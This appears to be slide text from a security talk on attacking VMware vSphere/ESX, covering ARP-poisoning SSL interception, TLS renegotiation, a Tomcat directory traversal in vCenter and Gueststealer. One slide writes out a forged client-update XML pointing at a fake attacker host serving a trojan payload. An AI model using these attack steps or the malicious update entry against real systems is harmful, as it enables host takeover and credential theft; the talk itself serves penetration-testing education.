Does vsphere really have some major issues? Recent Cases involving VMware Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO Mitigation Techniques Future Concerns?
VMware 80% of the Market Share Do the Tools used in Pen Testing work with virtualization? Are there hacks being designed just for VMware? What is this costing us? VMware moving away from ESX to VMware Hypervisor (ESXi)
VMware ESX Hypervisor VMware ESXi Type1 Hypervisor SC L2 Switch L2 Switch Posix Shell Provided by The Virtualization Practice.com
ESX ESXi Provided by The Virtualization Practice.com
What are the main security concerns associated with virtualization in general? Segregation of Duties Accounting/Logging New API s VMsafe vstorage vnetwork VMsafe Virtual Appliances Plug Ins Share Resources can they be attacked? Memory, CPU, Datastore
Threats Perceived Known Risks Probability Potential Impact
It is really a hardened Linux Kernel. It is still just another layer to attack! Common management errors ARP Cache Poisoning Update Manager SSLv3/TLS Renegotiation Web Server Vulnerability Many we know of Today Full on Exploits Metasploit and Exploit DB
Secunia Historic Advisories ESX 4.x ESXi 4.x vcenter Server 4.x nvd.nist.gov Over 40 Vulnerabilities for VMware Products McAfee Threats VMware ESX Server Heap Buffer Overflow vcenter Update Manager CSS vcenter Update Manager Directory Traversal
I can t tell you how many times I was asked to delay a pen test because the client was not READY??? What is that? When was the last time a hacker asked if you were ready before he attacked you. What is your current posture? How secure are you? How you empowered your people to do the correct things?
This does not change, regardless of the environment being tested. Information Gathering Scanning Enumeration Penetration Fail Start Over or tell them great job Succeed Escalate Privileges Steal Data or Leave proof of hack Cover Tracks Leave Backdoors
Google NMAP Since v4.8 Ettercap Cain and Abel Metasploit Claudio Criscione VASTO Virtualization ASsessment TOolkit
We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Lets see this in action!
ESX Sever SSL request SSL reply (Fake certificate) F&JLMDHGST*KU Stop Copy & Alter Cleartext SSL request SSL reply (Real Self Signed Cert) P)JDGH$FDSD@ ARP Cache Poisoning will allow us to perform a successful SSL crack! The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One between the victim and the hacker, the other between the hacker and the real server. The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.
VIC Client Login
You are still vulnerable even if you use vcenter. I can offer this: Once the above password is stolen you can login to the host with the vpxuser and above password.
ESX Sever STEP 1 Client Attacker Server (HTTPS) 1 TLS Handshake Session #1 (client <> server)
ESX Sever STEP 2 Client Attacker Server (HTTPS) 1.1 1.2 2 TLS Handshake Session #2 (attacker <> server) Attacker sends application layer command of his choice Renegotiation is triggered
ESX Sever STEP 3 Client Attacker Server (HTTPS) 3 TLS Handshake Session #1 continued (client<>server) Within the encrypted session #2 (attacker<>server) 4 Client data is encrypted within session #1 (Green) (The attacker cannot read/manipulate this data), previous data (1,2) prefixed to newly sent clientdata
Yes No
VMINVENTORY.XML /etc/vmware/hostd/vminventory.xml (default location) Gives us Guest inventory & location information
GUEST.VMX &.VMDK.vmx gives us Guest config and file locations.vmdk (disk image) can point to other.vmdk images
Let s See the Gueststealer in Action!
The nasty MiTM Attack!
VI luker The Auto Update Process <patchversion>3.0.0</patchversion> <apiversion>3.1.0</apiversion> <downloadurl>https://*/client/vmwareviclient.exe</downloadurl> The Evil Guy <patchversion>10.0.0</patchversion> <apiversion>3.1.0</apiversion> <downloadurl>https://evilserver.com/evilpaypoad.exe</do wnloadurl>
Change the clients.xml filename The package will run inder the user s priviledge! Administrator Anyone? Provide your nasty trojan package. Could be combined with other attacks. Create a fake web interface so you look ligit! This can be done as MiTM or Rouge Server You will trigger a certificate error Let s See this one in action! We are Troopers!
Autopwn How easy can it get? Uses a flaw in the Tomcat Web Server Transfers the Latest Session File from vcenter using a Directory Traversal Attack. Dictionary Attack How Large is your dictionary file? Fingerprinting Tool Need to know exactly what is running?
Any user that can access the Server get Admin access to the server! VMware is using an old version of TomCat that leaves the username and password in a world readable file!
Must be Trunked Ports if VLANs used
Race Conditions? VMsafe? DataStores? Other Plugins?